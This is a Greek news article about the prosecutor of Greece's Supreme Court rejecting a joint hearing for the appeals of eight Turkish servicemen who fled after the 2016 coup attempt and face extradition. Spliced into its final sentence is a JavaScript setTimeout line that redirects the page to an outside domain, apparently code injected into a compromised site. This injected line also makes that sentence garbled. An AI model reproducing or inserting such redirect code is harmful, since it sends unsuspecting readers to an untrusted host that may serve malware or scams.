Τούρκοι στρατιωτικοί: Απορρίφθηκε το αίτημα των 8 για συνεκδίκαση των αναιρέσεων τους

0
7

 

Η εισαγγελέας του Αρείου Πάγου, Ξένη Δημητρίου, απέρριψε το αίτημα των συνηγόρων των 8 Τούρκων στρατιωτικών, να συνεκδικαστούν στο Ποινικό Τμήμα του Αρείου Πάγου οι αιτήσεις αναίρεσης κατά των εφετειακών αποφάσεων που αφορούν την έκδοσή τους.

Μετά από αυτή την εξέλιξη οι αιτήσεις αναίρεσης των Τούρκων στρατιωτικών, που έφθασαν στη χώρα μας με ελικόπτερο λίγες ώρες μετά το αποτυχημένο πραξικόπημα της 15ης Ιουλίου 2016, θα συζητηθούν στα Ποινικά Τμήματα του Αρείου Πάγου στις 10, 11 και 13 Ιανουαρίου αντίστοιχα.

Υπενθυμίζεται ότι το Συμβούλιο Εφετών της Αθήνας, είχε εκδώσει αντίθετες αποφάσεις ως προς την έκδοση των «8» στην Τουρκία.
Δύο διαφορετικές συνθέσεις του δικαστικού συμβουλίου αποφάσισαν ομόφωνα, οι πέντε Τούρκοι αξιωματικοί να μην εκδοθούν.

Αντίθετα, άλλη σύνθεση του δικαστικού συμβουλίου έκρινε ότι οι τρεις πρέπει να εκδοθούν. Για τις δύο πρώτες περιπτώσεις, ο προϊστάμενος της Εισαγγελίας Εφετών, Αντώνης Λιώγας, άσκησε εφέσεις.

Ο κ. Λιώγας υποστήριξε ότι το Συμβούλιο Εφετών «έσφαλε περί την εκτίμηση των αποδείξεων» και ότι οι πέντε Τούρκοι έπρεπε να εκδοθούν στην Τουρκία setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here